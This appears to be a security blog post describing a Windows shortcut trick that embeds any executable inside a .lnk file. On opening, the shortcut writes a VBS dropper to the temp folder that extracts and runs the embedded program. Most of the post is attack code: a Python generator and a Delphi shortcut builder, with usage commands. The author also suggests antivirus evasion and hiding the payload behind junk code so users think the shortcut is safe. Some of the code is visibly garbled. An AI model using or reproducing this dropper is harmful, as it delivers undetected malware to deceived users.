It was only yesterday that we reported about a way of infecting Microsoft Windows users by using a simple shortcut trick with the BITSAdmin Tool to download and execute a remote application.
If you haven’t already read the article, please click here.
The main issue with the first example is that your firewall could potentially block the download attempt since it requires a remote http/https connection to download the file before its execution.
Our security researcher has found another sneaky way of exploiting the Windows shortcut with a new 0day by embedding any files (such as application files) directly inside the shortcut itself.
Yes! the application is inside the Windows shortcut
This makes the malicious application fully undetectable by any antivirus software before it will be dropped and executed.
Note: An an example, in the PoC mentioned below, we decided to use this vulnerability as a file dropper, but we could also create a version that injects the binary file directly into memory without being written to disk to become even more undectable for antivirus software on its execution. We will probably write another article about this method later
How does it work?
The first thing to do is to create a malicious VBS (Visual Basic Script) which will:
- Place the application file as an array of bytes (made in python script)
- Then create a temporary .exe file
- Write the byte array to this temporary file
- Execute the temporary .exe file.
When the VBS script is ready - still using our python script example - we will translate the VBS code in a single command line equivalent to be inserted into the new shortcut.
Windows normally allows a maximum shortcut command of around 260 characters, but using our previous Delphi trick for creating a new shortcut, you can insert any amount of characters without breaking the shortcut.
Create inline malicious VBS app extractor (Python 3.5)
# SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
# DISCOVERED AND CODED BY : @DarkCoderSc
# Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
# This little script will generate a malicious shortcut. A file will be embedded
# Inside, when executed it will be extracted and executed.
if len(sys.argv) != 3:
print(r"1) The executable file to be dropped (Needs to Exists)")
print(r"2) The destination malicious shell payload file")
FEXEFile = str(sys.argv)
FFileDest = str(sys.argv)
if not os.path.exists(FEXEFile):
print("The input executable file must exists!")
# TRANSFORM INPUT FILE IN BINARY ARRAY
payload = "payload=array(";
with open(FEXEFile, 'rb') as FFile:
s = FFile.read(1)
if len(s) == 0: break
b = ord(s)
payload += str(b) + ","
payload = payload[:-1]
payload += ")"
# WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL
tempFile = " >> %temp%\\tmp.vbs"
maliciousVBS = "del %temp%\\tmp.vbs & "
maliciousVBS += "echo " + payload + tempFile + " & "
maliciousVBS += "echo " + "Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")" + tempFile + " & "
maliciousVBS += "echo " + "Set CTF = FSO.CreateTextFile(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "echo " + "for i = 0 to UBound(payload)" + tempFile + " & "
maliciousVBS += "echo " + "buff = buff^&chr(payload(i))" + tempFile + " & "
maliciousVBS += "echo " + "next" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Write buff" + tempFile + " & "
maliciousVBS += "echo " + "Dim objShell" + tempFile + " & "
maliciousVBS += "echo " + "Set objShell = WScript.CreateObject(\"WScript.Shell\")" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Close" + tempFile + " & "
maliciousVBS += "echo " + "objShell.Run(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "%temp%\\tmp.vbs"
with open(FFileDest, 'w') as FDest:
Inject VBS to Shortcut (Delphi)
SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
DISCOVERED AND CODED BY : @DarkCoderSc
Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;
function MaliciousLnk(cmd, destPath : String) : Boolean;
var cObject : IUnknown;
shellLink : IShellLink;
PFile : IPersistFile;
result := false;
cObject := CreateComObject(CLSID_ShellLink);
shellLink := cObject as IShellLink;
PFile := cObject as IPersistFile;
cmd := '/C "' + cmd + '"';
result := PFile.Save(PWideChar(destPath), false) = S_OK;
var Arg1, Arg2 : String;
strList : TStringList;
if ParamCount <> 2 then begin
writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
writeln('- Arg2 : Full path of destination shortcut');
Arg1 := ParamStr(1);
Arg2 := ParamStr(2);
if NOT FileExists(Arg1) then exit;
// THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES
strList := TStringList.Create;
writeln(#13#10 + 'Press enter to leave...');
Example of payload (Simple Hello World in Assembly x86)
The maximum size of a shortcut is arround 64KiB which makes this exploit compatible with many known / unknown viruses
• Generate inline malicious VBS application extractor
py gen_inlinecode.py @APPLICATION_LOCATION @PAYLOAD_DESTINATION
• Then generate the shortcut
shortcut_gen.exe @PAYLOAD_LOCATION @SHORTCUT_DESTINATION
You should now see a new shortcut containing the whole application on it. When executed, it will extract the embedded application then execute from temporary folder.
Note, if you open shortcut properties, the whole code is not available since Microsoft normally only allow 260 bytes to be added in the argument field. This makes the shortcut even more difficult to spot. We could also modify our script to generate a regular junk "code" before the exploit code, then a regular user will think it is a normal / safe shortcut.